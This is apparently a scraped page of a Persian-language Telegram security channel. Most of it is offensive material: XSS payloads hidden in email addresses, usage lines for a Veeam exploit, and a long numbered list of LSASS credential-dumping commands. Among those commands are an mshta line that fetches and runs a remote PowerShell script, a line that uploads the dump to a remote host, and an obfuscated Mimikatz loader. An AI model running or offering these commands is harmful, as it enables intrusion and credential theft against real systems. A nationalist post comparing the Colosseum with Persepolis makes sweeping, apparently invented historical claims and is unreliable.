P.F.K Security
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
درباره Payloads در ایمیل

موضوع جدید نیست، اما همچنان مرتبط است. یکی از محبوب ترین آسیب پذیری های آدرس ایمیل، به نظر من، XSS است. طبق RFC822، پیلود را می توان به این صورت وارد کرد:

"payload"@domain.com
name@"payload"domain.com
name(payload)@domain.com
name@(payload)domain.com
[email protected](payload)



در اینجا می توانید بررسی کنید که آیا ایمیل شما درست است یا خیر. علاوه بر XSS، می توانید به دنبال آسیب پذیری های دیگری مانند SQLi، SSTI، RCE نیز باشید. من در اینجا با جزئیات بیشتری در مورد این صحبت کردم.

ممکن است این سوال پیش بیاید، اما چگونه می توان از سایت به چنین آدرسی ثبت نام کرد و پیام دریافت کرد؟ می‌توانید سرور ایمیل خود را راه‌اندازی کنید یا آن را آسان‌تر انجام دهید و از Burp Collaborator استفاده کنید. همه ایمیل‌های زیر معتبر هستند و به Burp Collab شما پیام ارسال می‌کنند (به جای xxxx.oastify.com با ایمیل شما):

[email protected]

mail(<script>alert(0)</script>)@xxxx.oastify.com

"<img/src/onerror=alert(0)>"@xxxx.oastify.com

#web
#xss
#rce
#sqli
#ssti
@PfkSecurity
CVE-2023-27532
بله، دوباره Veeam Backup & Replication
نشت حساب ها در متن ساده یا اجرای دستور از راه دور.
https://attackerkb.com/topics/ALUsuJioE5/cve-2023-27532/rapid7-analysis


POC exploit

usage:
VeeamHax.exe --target 192.168.0.100
Or
VeeamHax.exe --target 192.168.0.100 --cmd calc.exe

#veeam
#rce
#leakPass
@Pfksecurity
در سال 2023 ویندوز 11 AMSI را به خطر بیاندازید و بایپس کنید .

همچون(به عنوان) یک محقق امنیتی و مشتاق تیم قرمز، من همیشه مجذوب عملکرد درونی نرم افزار آنتی ویروس و سایر اقدامات امنیتی طراحی شده برای نگهداری از سیستم های رایانه ای بوده ام. بتازگی، چالش دور زدن رابط اسکن ضد بدافزار (AMSI) در ویندوز را برای خودم قرار دادم، یک ویژگی امنیتی که از زمان معرفی تیم‌های قرمز و مهاجمان را به دردسر انداخته است.
پس از ساعت‌های بی‌شماری تحقیق، آزمایش و آزمون و خطا، سرانجام در سال 2023 موفق شدم AMSI را دور بزنم. در این داستان، تکنیک‌ها و روش‌هایی را که برای انجام این شاهکار استفاده کردم را با شما به اشتراک می‌گذارم. از درک اصول اساسی AMSI تا تجزیه و تحلیل نقاط ضعف آن، من شرح گسترده از مراحلی که منجر به دور زدن موفقیت آمیز من شد ارائه خواهم کرد.
امیدوارم از طریق این داستان، چالش‌ها و پیش آمدهایی را که با تیم قرمز به وجود می‌آیند، و همچنین اهمیت استفاده مسئولانه و اخلاقی از مهارت‌ها و دانش، روشن کنم. بنابراین، دست و پنجه نرم کنید و در این سفر هیجان انگیز به دنیای دور زدن AMSI به من بپیوندید!

در تلاشم برای دور زدن AMSI، با ابزارهای C2 مانند Cobalt Strike، Sliver و Havoc C2 برخورد کردم. این ابزارها با قابلیت های خود مرا تحت تأثیر قرار دادند و بینش های ارزشمندی را در مورد نهش (وضعیت) فعلی سیستم های امنیتی ارائه کردند. از طریق کاوش در این ابزارها، به درک عمیق تری از نحوه تفکر و عملکرد مهاجمان دست یافتم که در آزمایش و تحقیق امنیتی مشروع من مفید واقع شده است.

Shellcodes

شل کدها به یک قطعه کد کوچک اشاره دارد که به عنوان اصطلاحا محموله یا ( پیلود )  در یک اکسپلویت یا حمله استفاده می شود. این برنامه به گونه ای طراحی شده است که مستقیماً در حافظه اجرا شود و می توان از آن برای کنترل یک سیستم تارگت، افزایش دسترسی ها یا انجام سایر اقدامات مخرب استفاده کرد.
برای پروژه‌ام، استفاده از پیلود Sliver را انتخاب کردم زیرا سطح بالایی از مخفی کاری را ارائه می‌داد و به من اجازه می‌داد تا از اقدامات امنیتی مختلف عبور کنم. Sliver یک ابزار محبوب C2 است که می تواند برای اهداف مختلفی از جمله تست نفوذ، تیم قرمز و سایر فعالیت های مرتبط با امنیت استفاده شود.

ادامه دارد ...
#AMSI #Bypass
@PfkSecurity
P.F.K Security pinned Deleted message
P.F.K Security
#0x16 > Cobalt Strike+Sysinternals Methods: load sysinternals Procexp “File” -> “Save” Cobalt Strike+schtasks Methods: cmd /c cmd /c Schtasks.exe /create /RU SYSTEM /SC Weekly /D SAT /TN Commands /TR "'’rundll32.exe’’ C:\windows\system32\comsvcs.dll MiniDump…
#0x28 > Manjusaka
Methods: mshta.exe javascript:A=new ActiveXObject(“WScript.Shell”).run(“powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(‘https://:/r.ps1')",0);close(); Manjusaka lsass dump

#0x29 >Dumpert
Methods: Dumpert.exe -k lsass.exe -s -o lsass.dmp
#0x30 >NanoDump
Methods: NanoDump.exe -t [process ID] -o [output file path]
#0x31 >Spraykatz
Methods: spraykatz.exe -w -u -p --krb5i --mimikatz "sekurlsa::minidump lsass.dmp" "exit"
#0x32 >HandleKatz
Methods: HandleKatz.exe -p lsass.exe HandleKatz.exe -p lsass.exe -o [handle ID] -dump
#0x33 >CallBackDump
Methods: CallbackDump.exe -d -p

#0x34 > LsassSilentProcessExit
Methods: LsassSilentProcessExit.exe

#0x35 > AndrewSpecial
Methods: AndrewSpecial andrew.dmp!
#0x36 >Masky
Methods: .\Masky.exe /ca:’CA SERVER\CA NAME’ (/template:User) (/currentUser) (/output:./output.txt) (/debug:./debug.txt)

#0x37 >SharpMiniDump
Methods: SharpMiniDump.exe -p -o lsass.dmp
#0x38 >MiniDump
Methods: MiniDump.exe /p /o
#0x39 >LsassDumpReflectiveDll
Methods: Import-Module .\ReflectiveLsassDump.dll Invoke-ReflectivePEInjection -PEBytes (Get-Content ReflectiveLsassDump.dll -Encoding Byte) -ProcessID (Get-Process lsass).Id

#0x40 >MoonSols Windows Memory Toolkit
Methods: MoonSolsWindowsMemoryToolkit.exe Dumping->Launch DumpIt LSASS->Select the process to dump

#lass
@PfkSecurity
ششم فروردین ماه #زادروز ابرمرد پاک ایران باستان، #اشوزرتشت اسپنتمان گرامی باد.💚🤍❤️
#زادروز پیام‌آور خرد #اشوزرتشت بزرگ آریایی شاد باد.💚🤍❤️

بشد نوروز پاک زندگانی☘️
بشد روزی که ماند جاودانی🍷
ششم روز زمان فروردین ماهی🌎
که زرتشت آمد و افروخت چراغی🔥

@PfkSecurity
ﺩﺭ ﺣﺪﻭﺩ ١٩٥٠ ﺳﺎﻝ ﭘﻴﺶ، ﺭﻭﻡ ﺑﻪ ﺍﻭﺭﺷﻠﻴﻢ ﺣﻤﻠﻪ ﻛﺮﺩ، ﺁﻥ ﺷﻬﺮ ﺭﺍ ﻭﻳﺮﺍﻥ ﻛﺮﺩ ﻭ ﻣﺮﺩﻣﺎﻧﺶ ﺭﺍ ﺑﻪ ﺑﺮﺩﮔﻰ ﮔﺮﻓﺖ .
ﺣﺪﻭﺩ ٤٥ ﺗﺎ ٦٠ ﻫﺰﺍﺭ ﻧﻔﺮ ﺍﺯ ﺍﻳﻦ ﺑﺮﺩﮔﺎﻥ، ﺑﺮﺍﻯ ﺳﺎﺧﺘﻦ *ﻛﻮﻟﻮﺳﻴﻮﻡ* ﺑﻪ ﻛﺎﺭﮔﺮﻓﺘﻪ ﺷﺪﻧﺪ .
ﺑﺨﺶ ﺑﺰﺭﮔﻰ ﺍﺯ ﺍﻳﻦ ﺑﺮﺩﮔﺎﻥ ﺩﺭ ﺣﻴﻦ ﻛﺎﺭ ﻛﺸﺘﻪ ﺷﺪﻧﺪ .
ﻣﺮﺍﺳﻢ ﺍﻓﺘﺘﺎﺣﻴﻪ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺑﺎ ﻛﺸﺘﺎﺭ ٩ ﻫﺰﺍﺭ ﺣﻴﻮﺍﻥ ﻏﻴﺮﺍﻫﻠﻰ ﺑﺮﮔﺰﺍﺭ ﺷﺪ .
ﺩﺭ ﻛﻮﻟﺴﻴﻮﻡ ﺯﻧﺎﻥ ﻭ ﻣﺮﺩﺍﻥ ﺍﺯ ﻫﻢ ﺟﺪﺍ ﺑﻮﺩﻧﺪ .
ﺟﺎﻳﮕﺎﻩ ﺯﻧﺎﻥ ﺩﺭ ﻃﺒﻘﻪ ﭘﻨﺠﻢ ﺑﻮﺩ، ﻛﻪ ﺩﻳد بسیار ﺑﺪﻯ ﺑﻪ ﻣﻴﺪﺍﻥ ﺩﺍﺷﺖ .
ﺟﺎﻳﮕﺎﻩ ﻣﺨﺼﻮﺹ ﺯﻧﺎﻥ ﺩﺭ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺑﺴﻴﺎﺭ ﻧﺎﺍﻣﻦ ﻭ ﺧﻄﺮﻧﺎﻙ بوﺩ، ﭼﺮﺍ ﻛﻪ ﺳﻜﻮﻫﺎﻯ ﺁﻧﻬﺎ ﺑﺎ ﻃﻨﺎﺏ ﻫﺎﻳﻰ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﻣﻴﺸﺪ ﻛﻪ ﻫﺮ ﺍﺯ ﭼﻨﺪﻯ ﭘﺎﺭﻩ ﻣﻴﺸﺪﻧﺪ
ﻭ ﺯﻧﺎﻥ ﺍﺯ ﺍﺭﺗﻔﺎﻉ ٥٠ ﻣﺘﺮﻯ ﺑﻪ ﭘﺎﻳﻴﻦ ﺳﻘﻮﻃﻰ ﻣﺮﮔﺒﺎﺭ ﻣﻴﻜﺮﺩﻧﺪ . ﺍﻣﺎ ﺟﺎﻳﮕﺎﻩ ﻣﺮﺩﺍﻥ ﺑﺴﻴﺎﺭ ﺍﻣﻦ ﺑﻮﺩ . ﺁﻧﻬﺎ ﺑﺮ ﺭﻭﻯ ﺳﻜﻮﻫﺎﻯ ﺳﻨﮕﻰ ﻣﻰ ﻧﺸﺴﺘﻨﺪ .

ﻛﻮﻟﻮﺳﻴﻮﻡ، ﻣﺤﻞ ﺑﺮﮔﺰﺍﺭﻯ ﺟﺸﻨﻬﺎﻯ ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﺑﻮﺩ .
ﺩﺭ ﻃﻰ ﺍﻳﻦ ﺟﺸﻨﻬﺎ، ﻛﻪ ﻫﺮباﺭ ١٠٠ ﺭﻭﺯ ﺑﻪ ﺩﺭﺍﺯﺍ ﻣﻴﻜﺸﻴﺪ، ﺣﻴﻮﺍﻧﺎﺕ ﺩﺭﻧﺪﻩ ﺭﺍ ﺑﻪ ﺟﺎﻥ ﺑﺮﺩﮔﺎﻥ ﻭ ﮔﻼﺩﻳﺎﺗﻮﺭﻫﺎ ﻣﻰ ﺍﻧﺪﺍﺧﺘﻨﺪ ﻭ ﻳﺎ ﮔﻼﺩﻳﻮﺗﻮﺭﻫﺎ، ﻛﻪ ﺑﺮﺩﻩ ﺑﻮﺩﻧﺪ ﻭ ﺍﻣﻴﺪ ﺑﻪ ﺯﻧﺪﮔﻰ ﺁﻧﻬﺎ ﺑﻪ ﺳﺨﺘﻰ ﺑﻪ ٢٢ ﺳﺎﻟﮕﻰ ﻣﻴﺮﺳﻴﺪ، ﺭﺍ ﻣﺠﺒﻮﺭ ﺑﻪ ﻛﺸﺘﻦ ﻳﻜﺪﻳﮕﺮ ﻣﻴﻜﺮﺩﻧﺪ .
ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﻧﻴﺰ ﺷﺎﻫﺪ ﺍﻳﻦ ﻛﺸﺘﺎﺭ ﺑﻮﺩﻧﺪ ﻭ ﺍﺯ ﺁﻥ ﻟﺬﺕ ﻣﻴﺒﺮﺩﻧﺪ .
ﺩﺭ ﻃﻰ ﻫﺮ ﺩﻭﺭﻩ ﺍﺯ ﺍﻳﻦ ﺟﺸﻦ ﻫﺎ ﺣﺪﻭﺩ ٥ ﻫﺰﺍﺭ ﺑﺮﺩﻩ ﻭ ﮔﻼﺩﻳﻮﺗﻮﺭ ﺑﻪ ﻗﺘﻞ ﻣﻴﺮﺳﻴﺪﻧﺪ .
ﺩﺭ ﺭﻭﺯﻫﺎﻳﻰ ﻛﻪ ﺟﺸﻦ ﺑﺮﻗﺮﺍﺭ ﻧﺒﻮﺩ، ﻣﺤﻜﻮﻣﺎﻥ ﺑﻪ ﻣﺮﮒ ﺭﺍ ﺟﻠﻮﻯ ﺣﻴﻮﺍﻧﺎﺕ ﺩﺭﻧﺪﻩ ﻣﻰ ﺍﻧﺪﺍﺧﺘﻨﺪ ﺗﺎ ﺯﻧﺪﻩ ﺯﻧﺪﻩ ﺧﻮﺭﺩﻩ ﺷﻮﻧﺪ .
ﺍﻣﭙﺮﺍﺗﻮﺭ ﻭ ﻣﺮﺩﻡ ﺭﻡ ﻧﻴﺰ ﺷﺎﻫﺪ ﺯﻧﺪﻩ ﺯﻧﺪﻩ ﺧﻮﺭﺩﻩ ﺷﺪﻥ ﺍﻳﻦ ﺁﺩﻣﻴﺎﻥِ تیره ﺑﺨﺖ ﺑﻮﺩﻧﺪ .
ﺩﺭ ﻛﻞ،
*ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ، ﺍﺯ ﺟﻤﻠﻪ ٥٠٠ ﺗﺎ ٧٠٠ ﻫﺰﺍﺭ ﮔﻼﺩﻳﺎﺗﻮﺭ، ﺩﺭ ﺻﺤﻦ ﻛﻠﻮﺳﻴﻮﻡ ﺑﻪ ﻃﺮﺯ ﻭﺣﺸﻴﺎﻧﻪ ﺍﻯ ﻛﺸﺘﻪ ﺷﺪﻧﺪ* .
ﺍﻳﻦ ﻣﻴﺪﺍﻥ ﭼﻬﺎﺭ ﻫﺰﺍﺭ ﻣﺘﺮ ﻣﺮﺑﻌﻰ، ﺑﺰﺭﮔﺘﺮﻳﻦ ﻗﺘﻠﮕﺎﻩ ﺗﺎﺭﻳﺦ ﺑﺸﺮﻳﺖ ﺑﻮﺩﻩ ﺍﺳﺖ .

ﺍﻣﺮﻭﺯﻩ، ﻛﻮﻟﻮﺳﻴﻮﻡ ﻣﺤﺒﻮﺑﺘﺮﻳﻦ ﺑﻨﺎﻯ ﺍﻳﺘﺎﻟﻴﺎ، ﻧﻤﺎﺩ ﺷﻬﺮ ﺭﻡ ﻭ ﺗﻤﺪﻥ ﺭﻭﻣﻰ ﺍﺳﺖ .
ﻫﻤﻪ ﺭوﻣﻴﺎﻥ،ایتاﻟﻴﺎﻳﻴﻬﺎ ﻭ ﺣﺘﻰ ﺍﺭﻭﭘﺎﻳﻴﻬﺎ ﺑﻪ ﺍﻳﻦ ﺗﻤﺪﻥ ﺍﻓﺘﺨﺎﺭ ﻣﻴﻜﻨﻨﺪ . !
ﺩﺭ ﺳﺎﻝ ٢٠٠٧، ﺩﺭ ﻃﻰ ﻳﻚ ﻧﻈﺮﺳﻨﺠﻰ ﺑﺎ ﺷﺮﻛﺖ ﺑﻴﺶ ﺍﺯ ﻳﻜﺼﺪ ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ، *ﻛﻮﻟﻮﺳﻴﻮﻡ ﺟﺰﻭ ٧ ﺍﺛﺮ* ﺑﺮﺗﺮ ﻭ ﻣﺤﺒﻮﺏ ﺟﻬﺎﻥ ﺑﺮﮔﺰﻳﺪﻩ ﺷﺪ .!!!
ﺩﺭ ﺳﺎﻝ ٢٠١١، ﻣﺒﻠﻎ ٢٥ ﻣﻴﻠﻴﻮﻥ ﻳﻮﺭﻭ، ﺗﻨﻬﺎ ﺑﺮﺍﻯ ﺗﻤﻴﺰ ﻛﺮﺩﻥ ﺩﻳﻮﺍﺭﻫﺎﻯ ﻛﻮﻟﻮﺳﻴﻮﻡ ﻭ ﭼﻨﺪ ﻛﺎﺭ
ﺑﺴﻴﺎﺭ ﺟﺰﻳﻰ ﺩﻳﮕﺮ ﺩﺭ ﺩﺭﻭﻥ ﺁﻥ، ﻫﺰﻳﻨﻪ ﺷﺪ .
ﻳﻚ ﺿﺮﺏ ﺍﻟﻤﺜﻞ ﻗﺪﻳﻤﻰ ﺍﻳﺘﺎﻟﻴﺎﻳﻰ ﻣﻴﮕﻮﻳﺪ :

*" تازﻣﺎﻧﻰ ﻛﻪ ﻛﻮﻟﻮﺳﻴﻮﻡ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ،    ﺭﻡ ﻧﻴﺰ ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ".*

ﺣﺪﻭﺩ ٦٠٠ ﺳﺎﻝ ﭘﻴﺶ ﺍﺯ ﺳﺎﺧﺘﻪ ﺷﺪﻥ ﻛﻮﻟﻮﺳﻴﻮﻡ، ﺍﻳﺮﺍﻧﻴﺎﻥ *ﺗﺨﺖ ﺟﻤﺸﻴﺪ* ﺭﺍ ﺳﺎﺧﺘﻨﺪ .
*-ﺍﺛﺮﻯ ﭘﺮﺷﻜﻮﻩ ﺑﺎ ﺯﻳﺮﺑﻨﺎﻯ ١٧٥ ﻫﺰﺍﺭ ﻣﺘﺮ - ٨ ﺑﺮﺍﺑﺮ ﻛﻞ ﺯﻳﺮﺑﻨﺎﻯ ﻛﻮﻟﻮﺳﻴﻮﻡ* .
ﺑﺮ ﺍﺳﺎﺱ ﺳﻨﺪﻫﺎﻯ ﻏﻴﺮ ﻗﺎﺑﻞ ﺍﻧﻜﺎﺭ - ﺧﺸﺖ ﻫﺎﻯ ﭘﺨﺘﻪ ﺷﺪﻩ ﺁﻥ ﺯﻣﺎﻥ
*-ﺩﺭ ﺳﺎﺧﺘﻦ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻫﻴﭻ ﺑﺮﺩﻩ ﺍﻯ ﺑﻪ ﻛﺎﺭ ﮔﺮﻓﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ*.
ﻛﺎﺭﮔﺮﺍﻥ، ﻣﻬﻨﺪﺳﺎﻥ ﻭ ﻫﻨﺮﻣﻨﺪﺍﻥ ﺍﻳﺮﺍﻧﻰ ﺩﺭ ﺑﻬﺘﺮﻳﻦ ﺷﺮﺍﻳﻂِ ﻛﺎﺭﻯِ ﻣﻤﻜﻦ ﺍﻳﻦ ﺍﺛﺮ ﺑﺰﺭﮒ ﺑﺸﺮﻯ ﺭﺍ ﺁﻓﺮﻳﺪﻧﺪ .

ﭘﺎﺩﺷﺎﻫﺎﻥ ﺍﻳﺮﺍﻧﻰ ﺩﺭ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﺟﺸﻨﻬﺎﻯ ﺍﻳﺮﺍﻧﻰ ﻣﺎﻧﻨﺪ *ﻧﻮﺭﻭﺯﻭﻣﻬﺮﮔﺎﻥ*،
ﻛﻪ ﺭﻳﺸﻪ ﺩﺭ *ﺁﺷﺘﻰ، ﻣﻬﺮ، ﻃﺒﻴﻌﺖ ﻭ ﺯﻧﺪﮔﻰ ﺍﻧﺴﺎﻧﻰ ﺩﺍﺭﺩ*، ﺭﺍ ﺑﺮﭘﺎ ﻣﻴﺪﺍﺷﺘﻨﺪ .
ﻫﻤﻪ ﻧﮕﺎﺭﻩ ﻫﺎﻯ ﺣﻚ ﺷﺪﻩ ﺑﺮ ﺩﻳﻮﺍﺭﻫﺎ ﻭ ﺳﻨﮕﻬﺎﻯ ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻧﺸﺎﻧﮕﺮ *ﺟﺸﻨﻬﺎ، ﻓﺮﻫﻨﮓ ﻭ ﻣﻴﺘﻮﻟﻮﮊﻯ ﺯﻳﺒﺎﻯ ﺍﻳﺮﺍﻧﻰاست.*

درتصاویرحکاکی شده برسنگ نبشته های تخت جمشید ،
هیچکس خشمگین وعصبانی نیست،
هیچکس سوار بر اسب نیست،
هیچکس رادرحال تعظیم نمی بینید،
هیچ زمان برده داری در ایران نبوده،
درمیان این همه پیکر تراشیده شده، حتی یک نقش،تصویر  وچهره ی برهنه وجود ندارد.
*ﺗﺨﺖ ﺟﻤﺸﻴﺪ ﻣﺮﻛﺰ ﺑﺰﺭﮔﺘﺮﻳﻦ ﻗﺪﺭﺕ ﺟﻬﺎﻥ ﺩﺭ ﺁﻥ ﺭﻭﺯﮔﺎﺭ ﺑﻮﺩﻩ ﺍﺳﺖ* .
ﺍﻣﺎ ﺑﺮﺧﻮﺭﺩ ﺑﺮﺧﻰ ﺍﺯ ﻣﺎ ﺍﻳﺮﺍﻧﻴﺎﻥ، ﺑﻪ ﻭﻳﮋﻩ واپسگرایان ﻭ ﺑﺮﺧﻰ ﻣﺪﻋﻴﺎﻥ ﺭﻭﺷﻨﻔﻜﺮﻯ، ﺑﺎ ﺍﻳﻦ ﺍﺛﺮ ﺑﺰﺭﮒ ﻫﻨﺮﻯ ﺟﻬﺎﻥ ﺑﺴﻴﺎﺭ ﻏﻴﺮﺩﻭﺳﺘﺎﻧﻪ ﻭ ﻧﺎﺑﺨﺮﺩﺍﻧﻪ ﺑﻮﺩﻩ ﺍﺳﺖ.
ﺩﺭ ﺗﺨﺖ ﺟﻤﺸﯿﺪ ۳۲ ﻫﺰﺍﺭ ﻟﻮﺡ ﮔﻠﯽ ﺑﺪﺳﺖ آﻣﺪﻩ ﮐﻪ ﺩﺭ ﺍﻥ ﺷﺮﺡ ﻭﻗﺎﯾﻊ ﺭﻭﺯﺍﻧﻪ ﺭﺍ ﺩﺭ ﻣﺮﺍﺣﻞ ﺳﺎﺧﺖ ﺍﯾﻦ ﺑﻨﺎﯼ ﺑﺎﺷﮑﻮﻩ ﺑﯿﺎﻥ ﻣﯿﮑﻨﺪ ﺑﺎ ﺗﻤﺎﻡ ﺟﺰﺋﯿﺎﺕ ﻣﺜل ﺍﯾﻨﮑﻪ ﮐﺎﺭﮔﺮﺍﻥ و ﻣﻬﻨﺪﺳﺎﻥ ﻫﺮ ﮐﺪﺍﻡ ﺑﻪ ﻧﻮﻉ ﺗﺨﺼﺼﯽ ﮐﻪ ﺩﺍﺭند ﭼﻪ ﻣﯿﺰﺍﻥ ﺣﻘﻮﻕ ﺩﺭﯾﺎﻓﺖ ﻣﯿﮑﻨﻨﺪ،
*ﮐﺸﻮﺭﻫﺎﯼ ﺩﺍﻋﯿﻪ ﺩﺍﺭ ﺣﻘﻮﻕ ﺑﺸﺮ ﺑﻪ ﭼﻪ ﭼﯿﺰﯼ ﻣﻔﺘﺨﺮﻥ ﻭ ﻣﺎ ﭼﻪ ﭼﯿﺰﯼ ﺭﺍ ﻟﻌﻦ ﻭ ﻧﻔﺮﯾﻦ ﻣﯿﮑﻨﯿﻢ ﻭ ﻧﻤﺎﺩﯼ ﺍﺯ ﻇﻠﻢ ﻭ ﺳﺘﻢ ﺟﺒﺎﺭﺍﻥ ﻭ ﺳﺘﻤﮕﺮﺍﻥ ﺭﻭﺯﮔﺎﺭ ﻣﯿﺪاﻧﯿﻢ*.
ﺑﺎﻭﺭ ﮐﻨﯿﺪ ﻫﯿﭻ ﻣﻠﺘﯽ ﺩﺭ ﺩﻧﯿﺎ ﭼﻨﯿﻦ ﮐﻤﺮ ﺑﻪ ﺗﺨﺮﯾﺐ ﻫﻮﯾﺖ ﻭ ﻣﻠﯿﺖ ﻭ ﺗﺎﺭﯾﺦ ﺧﻮﺩ ﻧﺒﺴﺘﻪ ﮐﻪ ﻣﺎ ﺑﺴﺘﻪ ﺍﻳﻢ.
ﺩﺭ ﺍﻧﮕﻠﺴﺘﺎﻥ کاسه ﺳﯿﺼﺪ ﺳﺎﻟﻪ ﭘﯿﺪﺍ ﻣﯿﺸﻮﺩ ﻭ ﺭﺳﺎﻧﻪ ﻫﺎﻳﺸﺎﻥ ﮔﻮﺵ ﺩﻧﯿﺎ ﺭﺍ ﮐﺮ ﻣﯿﮑﻨﻨﺪ
ﻭلی ﻣﺎ ﺗﭙﻪ ﻫﺎ ﻭ ﻣﺤﻮﻃﻪ ﻫﺎﯼ ۷۰۰۰ ﺳﺎﻟﻪ ﮐﻪ ﻣﺪﻧﯿﺖ ﺩﻧﯿﺎ ﺩﺭ آﻥ ﻣﺘﻮﻟﺪ ﺷﺪﻩ ﺭﺍ  ﺑﺎ ﻟﻮﺩﺭ ﺗﺨﺮﯾﺐ ﻣﻲ کنیم !!

ﺗﻔﺎﻭﺕ
*ﺍﯾﺮﺍﻥ ﻭ ﺍﺭﻭﭘﺎ!!!*

ﺗﻔﺎﻭﺕ
*( ﺗﺨﺖ ﺟﻤﺸﯿﺪ ‏) ﺑﺎ( ﮐﻮﻟﻮﺳﯿﻮﻡ)*
@pfksecurity
آکادمی راوین وابسته به وزارت اطلاعات امروز توسط دولت کانادا تحریم شد.
#راوین #آکادمی_راوین #تحریم
@PfkSecurity
#CVE-2023-1177:
هک هوش مصنوعی
- کنترل سیستم و ابر از طریق MLflow Exploit (LFI/RFI در MLflow 2.1.1)

https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/
https://protectai.com/blog/hacking-ai-system-takeover-exploit-in-mlflow

@PfkSecurity
#0x41 > Comsvcs.dll
Methods: regsvr32 comsvcs.dll rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump lsass.exe lsass.dmp full

#0x42 > MirrorDump
Methods: .\MirrorDump.exe -f “NotLSASS.zip” -d “LegitLSAPlugin.dll” -l 1073741824

#0x43 >Dumpy
Methods: dumpy.exe dump -k secretKey -u https://remotehost/upload force

#0x44 >RToolZ+ProcExp152.sys
Methods: .\procexp64.exe -accepteula /t RToolZ -p

#0x45>SharpUnhooker+LsassUnhooker
Methods: LsassUnhooker.exe -r SharpUnhooker.exe inject --process lsass.exe --modulepath ReflectiveDLL.dll SharpUnhooker.exe dump --process lsass.exe --output lsass_dump.bin

#0x46 >hashdump
Methods: Kldumper.exe laZagne_x64.exe PwDump7.exe QuarksPwDump.exe SqlDumper.exe Wce_x64.exe SAMInside.exe
#0x47 >Mimikatz+Invoke-Obfuscation
Methods: Invoke-Obfuscation -ScriptBlock { [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes(‘C:\mimikatz.exe’)) } -Command ‘Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(“JABzAD0ATwB2AGkAZQBzAC4AQwBvAG0AbQBhAG4AQQB0AHIAZQBzAEMAaABhAG4AZAAoAFsAUwB5AHMAdABlAG0ALgBDAHIAZQBzAG8AXQAuAFQAcgBpAGMAeQBTAHQAcgBlAGEAbQAuAEEAcABwAG8AcgB0AGwAZQBOAGEAbQBlAFMAdABpAG4AZwBdACkAIAB8ACAACgAkAHMAdwB3AG8AcgBkACAAPQAgAFsAcwBdAC4AVwBpAG4AZABvAHcAbgBhAGwAaQB6AGUAXQAoAFsAUwB5AHMAdABlAG0ALgBJAG4AdgBpAGQAZQBJAHQAKAAiAEMAaABhAG4AZAAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbQBwAHIAZQBzAGgAZQBuAGQAKQBdAC4AQQBzAHMAZQBtAGIAbABlAC4AVABvAHAAYwBvAG4AcwB0AHIAYQB0AGUAZAAoACcAKwAnACsAJwApAC4AUABhAGMAZQBuAHQAYQB0AGUAUwB0AGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB2AGkAZABlAEkAdAAoACcARQB4AGkAbgBzAGMAcgBpAHAAbwB3AGUAcgBzAGgAZQBuAGMAaABpAG8AbgBzAHQAcgBpAG4AZwAnACkAKQBdACkA”)]))’
Import-Module PowerSploit Invoke-Mimikatz -DumpCreds
#0x48 > BetterSafetyKatz
Methods: .\BetterSafetyKatz.exe .\BetterSafetyKatz.exe ‘.\mimikatz_trunk.zip’
Sekurlsa::minidump

#lass
@PfkSecurity
استفاده از دستاورد دیگران برای جذب مخاطب یک کار غیر اخلاقی دیگر است و عدم وجود مدیریت صحیح در انتشار پست ها باعث کشف RCE و Buffer Overflow میشود😂 از این رو Buffer Overflow که توسط آن ، RCE بدست امده اینگونه متلاشی میشود که یک ایرانی که سواد کافی جهت فعالیت در حوزه امنیت را ندارد شروع به نوشتن writeup میکند !
در ایران گویا دروغ گفتن عادت شده ؛ در تاریخ و ساعت :
 December 21, 2018 12:21pm +0330
یک گزارش در هکروان توسط :
vinnievan
ثبت شده است ؛ لینک :
https://hackerone.com/reports/470520
گویا یک ایرانی طبق تصویر مدعی شده که توانسته Buffer Overflow از CSGO کشف کند :) گزارشی که توسط فرد / افراد دیگری گزارش شده است ! استاد شما به خودی خود یک buffer  overflow  ثبت نکرده بودن عزیز... !

دنیای امنیت را به گند نکشید .
#APTIran
@PfkSecurity
اجراهای ضبط شده از BlackHat22 رسید!

مجموعه ای از گزارش های مختلف در مورد رمزنگاری خارجی، داخلی، معکوس.

لیست پخش:
- آسیب پذیری در ماتریس.
- حملات به AFDS
- حمله به خودروهای الکتریکی
- حملات به Kerberos RC4.
- بایپس EDR؛
- حملات به قراردادهای هوشمند؛
- دور زدن WAF:
- حملات در سطح کانال.

https://yewtu.be/watch?v=V_HwRtUk5tI&list=PLH15HpR5qRsVY4gZPQrkdVBeR_BwNujGe

@PfkSecurity
دروغ گفتن هیچوقت آیین ایرانیها نبوده

آیین ما پندار نیک، گفتار نیک و کردار نیک بود

دروغ ۱۳ هم شاملش نمی شود !
@PfkSecurity